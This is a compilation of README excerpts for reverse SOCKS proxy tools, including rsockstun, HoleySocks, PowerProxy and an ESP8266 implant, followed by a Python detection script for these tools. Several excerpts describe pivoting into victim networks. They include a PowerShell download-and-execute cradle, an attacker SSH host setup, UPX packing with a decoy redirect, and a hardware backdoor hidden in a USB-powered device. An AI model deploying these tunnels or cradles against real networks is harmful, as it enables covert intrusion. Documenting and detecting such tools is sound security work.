A SOCKS5 reverse proxy server.
RSOCKS is a reverse proxy server for transferring traffic of a specific host through a SOCKS5 proxy. It is useful for using SOCKS5 in applications that don't have SOCKS proxy support.
Installation
$ pip install rsocks
Or
$ easy_install rsocks
To upgrade to the latest version, run:
$ pip install -U rsocks
Usage
First, we need to create a config file with the following format:
# /path/to/rsocks.toml
[servers.foo]
proxy = "socks4://user:pass@192.168.1.10:1080"
listen_host = "0.0.0.0"
listen_port = 5025
upstream_host = "smtp.example.com"
upstream_port = 25
upstream_ssl = false
Here is an example that forwards Gmail's SMTP/IMAP through a SOCKS5 proxy server:
[servers.imap]
proxy = "socks5://localhost:1080"
listen_port = 5993
upstream_host = "imap.gmail.com"
upstream_port = 993
upstream_ssl = true

[servers.smtp]
proxy = "socks5://localhost:1080"
listen_port = 5465
upstream_host = "smtp.gmail.com"
upstream_port = 465
upstream_ssl = true
Next, we start the rsocks server:
$ rsocks --config=/path/to/rsocks.toml
[14:24:44] rsocks.servers.smtp Using proxy server socks5://localhost:1080
[14:24:44] rsocks.servers.smtp Listening 127.0.0.1:5465
[14:24:44] rsocks.servers.imap Using proxy server socks5://localhost:1080
[14:24:44] rsocks.servers.imap Listening 127.0.0.1:5993
[14:24:44] rsocks.pool Prepared "smtp"
[14:24:44] rsocks.pool Prepared "imap"
[14:24:44] rsocks.servers.smtp Starting server...
[14:24:44] rsocks.servers.imap Starting server...
Keep it running, then open your application (such as Airmail on OS X) and set the server option to the local forwarding address:
SMTP: 127.0.0.1:5465 without SSL
IMAP: 127.0.0.1:5993 without SSL
Now the application's traffic will be forwarded through the proxy server (socks5://127.0.0.1:1080).
If you wish to run the rsocks server in the background, check the Platform Service Templates. For example, OS X users can create a com.tonyseek.rsocks.plist file in ~/Library/LaunchAgents and load it as a service:
$ nano ~/.rsocks.toml # create a config file
$ wget https://github.com/tonyseek/rsocks/blob/master/misc/platforms/osx-launchd/com.tonyseek.rsocks.plist \
    -O ~/Library/LaunchAgents/com.tonyseek.rsocks.plist
$ nano ~/Library/LaunchAgents/com.tonyseek.rsocks.plist # edit the template
$ launchctl load -w ~/Library/LaunchAgents/com.tonyseek.rsocks.plist
from https://github.com/tonyseek/rsocks
------
rsocks
Tiny little reverse socks5 client & server.
Usage:
rsocks - reverse socks5 server/client
https://github.com/brimstone/rsocks
Usage:
1) Start rsocks -listen :8080 -socks 127.0.0.1:1080 on the client.
2) Start rsocks -connect client:8080 on the server.
3) Connect to 127.0.0.1:1080 on the client with any socks5 client.
4) Enjoy. :]
This binary functions as both the client and the server. It does not encrypt communications.
from https://github.com/brimstone/rsocks
------
Reverse socks tunneler with NTLM and proxy support.
rsockstun
Reverse socks5 tunneler with SSL and proxy support.
Based on https://github.com/brimstone/rsocks
Usage:
0) Generate self-signed certificate with openssl: openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
1) Start on VPS: rsockstun -listen :8443 -socks 127.0.0.1:1080 -cert cert
2) Start on client: rsockstun -connect clientIP:8443
3) Connect to 127.0.0.1:1080 on the VPS with any socks5 client.
4) Enjoy. :]
Add params:
-proxy 1.2.3.4:3128 - connect via proxy
-proxyauth Domain/username:password - proxy creds
-proxytimeout 2000 - server and clients will wait 2000 msec for proxy connections (sometimes it needs to be up to 4000)
-useragent "Internet Explorer 9.99" - User-Agent used in the proxy connection (sometimes it is useful)
-pass Password12345 - challenge password between client and server (if it does not match, the server replies with a 301 redirect)
-recn - number of reconnection attempts. Default is 3. If 0, reconnects indefinitely
-rect - delay in seconds between reconnection attempts. Default is 30
Compile and Installation:
Linux VPS
- install Golang: apt install golang
- export GOPATH=~/go
- go get github.com/hashicorp/yamux
- go get github.com/armon/go-socks5
- go get github.com/ThomsonReutersEikon/go-ntlm/ntlm
- go build
launch:
./rsockstun -listen :8443 -socks 127.0.0.1:1080 -cert cert -agentpassword Password1234
Windows client:
- download and install golang
- go get github.com/hashicorp/yamux
- go get github.com/armon/go-socks5
- go get github.com/ThomsonReutersEikon/go-ntlm/ntlm
If you want to use proxy NTLM auth - patch go-ntlm\ntlm\payload.go packet:
bytes := utf16FromString(value) -> bytes := []byte(value)
p.Type = UnicodeStringPayload -> p.Type = OemStringPayload
- go build
optional: to build as Windows GUI: go build -ldflags -H=windowsgui
optional: to compress exe - use any exe packer, ex: UPX
launch:
rsockstun.exe -connect clientIP:8443 -agentpassword Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain\username:userpass -useragent "Mozilla 5.0/IE Windows 10"
The client connects to the server and sends agentpassword to authorize itself. If the server does not receive agentpassword, or receives a wrong password from the client (for example, if a spider or a browser connects to the server), it sends an HTTP 301 redirect to www.microsoft.com
from https://github.com/llkat/rsockstun
-----------
Cross-Platform Reverse Socks Proxy in Go.
HoleySocks
Getting Started
As a standalone binary
All the parameters needed to start the socks server and forward it over SSH must be embedded in the binary.
Do this by creating config/ssh.json and using make
cat <<EOF > configs/ssh.json
{
"ssh": {
"username": "sshuser",
"host": "attacker.demo.lan",
"port": 22
},
"socks": { "remote": "127.0.0.1:1080" }
}
EOF
make
CAUTION: The generated private keys are embedded into the binary to allow for the reverse port forwarding without interaction. Follow the instructions below.
Before running the generated binaries, you'll need a user on your attacking machine for receiving the reverse ssh connection that forwards the socks proxy from the victim.
Once that user has been created (with a homedir and /bin/false shell), append the generated pubkey to the authorized_keys file on the attacking machine.
The Makefile should generate the needed commands and entry for you when you run make.
from https://github.com/audibleblink/holeysocks
----
Reverse transparent protocol agnostic socks proxy.
A transparent reverse protocol agnostic socks proxy. It allows you to set up gateways to an onion and to hide the address of a reverse proxy from the server and the server's address from the general public. The main purpose is to allow clearnet access to Tor hidden services.
To configure, simply set the configuration parameters in config.py and then run:
./proxy start
It only requires root if the listener port is less than 1024.
from https://github.com/jtripper/reverse-proxy
------
PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy
PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.
Setup
Import the script:
iex (new-object net.webclient).downloadstring("http://192.168.0.22/PowerProxy.ps1")
# OR
Import-Module \\192.168.0.22\Public\PowerProxy.ps1
reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn't installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the --no-encrypt option.
Usage
For detailed usage, check out PowerProxy's help, or use ./reverse_proxy_handler.py --help
Run a reverse proxy
On local machine, start the handler:
# Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080
In PowerShell:
Start-ReverseSocksProxy 172.1.1.20 -Port 8080
Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:
curl --socks4 127.0.0.1:1080 http://10.10.2.69/
Run a traditional SOCKS server
Start-SocksProxy 172.10.2.20 -Port 9050
Require authentication
Use PSCredential objects to require a username and password:
# Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force "Passw0rd123"
$Cred = New-Object System.Management.Automation.PSCredential ("ProxyUser", $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose
Limitations
- At the moment, only CONNECT requests are supported. BIND support is a goal, if practical.
- GSSAPI authentication is not supported.
- reverse_proxy_handler.py is only tested on UNIX-based machines, and probably doesn't work on Windows.
from https://github.com/get-get-get-get/PowerProxy
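For the blue-team side of the rsocks/rsockstun flags and the PowerProxy cmdlets documented above, an added example (not code from any of these projects) that classifies process command lines and script-block text by those documented strings. The rule names, host names and sample records are constructed for illustration.

```python
import re

# Indicators come from the usage text on this page; rule names are invented here.
FLAG = re.compile(r"(?<!\S)-{1,2}([A-Za-z]+)")             # a flag at the start of a token
ENDPOINT = re.compile(r"(?<!\S)-connect\s+\S+:\d+", re.I)  # -connect host:port
EXTRA = {"agentpassword", "pass", "proxy", "proxyauth", "proxytimeout",
         "useragent", "recn", "rect"}
POWERPROXY = re.compile(r"\bStart-(Reverse)?SocksProxy\b|reverse_proxy_handler\.py", re.I)
CRADLE = re.compile(r"\biex\b.*downloadstring\s*\(", re.I)

# Constructed process-creation / script-block records: (host, command line).
EVENTS = [
    ("ws-114", r"rsockstun.exe -connect 203.0.113.5:8443 -agentpassword REDACTED "
               r"-proxy proxy.corp.example:3128 -proxyauth CORP\svc:REDACTED"),
    ("vps-01", "./rsocks -listen :8080 -socks 127.0.0.1:1080"),
    ("ws-207", "powershell -c Start-ReverseSocksProxy 198.51.100.7 -Port 8080"),
    ("ws-207", 'iex (new-object net.webclient).downloadstring("http://files.example/p.ps1")'),
    ("build-3", "curl --connect-timeout 5 https://mirror.example/pkg.tgz"),
]

def classify(cmdline):
    """Return the set of rule names matched by one command line or script block."""
    hits = set()
    flags = {f.lower() for f in FLAG.findall(cmdline)}
    if ENDPOINT.search(cmdline):
        # -connect host:port alone is weak; the page's extra flags raise confidence.
        hits.add("reverse_socks_agent_strong" if flags & EXTRA
                 else "reverse_socks_agent_weak")
    if {"listen", "socks"} <= flags:
        hits.add("reverse_socks_listener")
    if POWERPROXY.search(cmdline):
        hits.add("powerproxy")
    if CRADLE.search(cmdline):
        hits.add("powershell_download_cradle")
    return hits

def scan(events):
    """Return sorted (host, rule) pairs for every record that matched a rule."""
    return sorted((host, rule) for host, cmd in events for rule in classify(cmd))

if __name__ == "__main__":
    for host, rule in scan(EVENTS):
        print(f"{host}: {rule}")
```

Binaries can be renamed, so the rules key on argument shape rather than on the executable name.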
---------
Esp8266-reverse-socks5
Reverse http proxy, reverse tcp, reverse socks5 proxy based on the esp8266.
Once you know the wifi credentials, this project aims to set up a reverse tcp backdoor.
It can be hidden in a droppable box or any usb powered device.
Uses the esp8266 with a known wifi access point to build a reverse socks5 tunnel.
- Setup your esp-open-rtos path in the makefile
- Flash and start the esp:
make flash
- wait until it creates a configuration access point
- connect to http://172.16.0.1/
- configure wifi and home server
- do not forget to fill the Security check with the serial id as returned by sdk_system_get_chip_id()
- reboot
Socks5 proxy
On the server side:
python main.py -s -r 8888 -l 8889
And then connect to localhost:8889 with a socks5 client to access the remote network. For ssh, it would be:
ssh -v -o ProxyCommand='nc -X 5 -x 127.0.0.1:8889 %h %p' 192.168.x.x # remote local machine
HTTP proxy
On the server side:
python main.py -p -r 8888 -l 8889
HTTP_PROXY="127.0.0.1:8889" wget http://hackaday.com
Raw TCP socket
On the server side:
python main.py -r 8888 -l 8889
echo "hello from server" | nc localhost 8889
from https://github.com/mehdilauters/esp8266-reverse-socks5
-------
https://github.com/IdoBn/skcos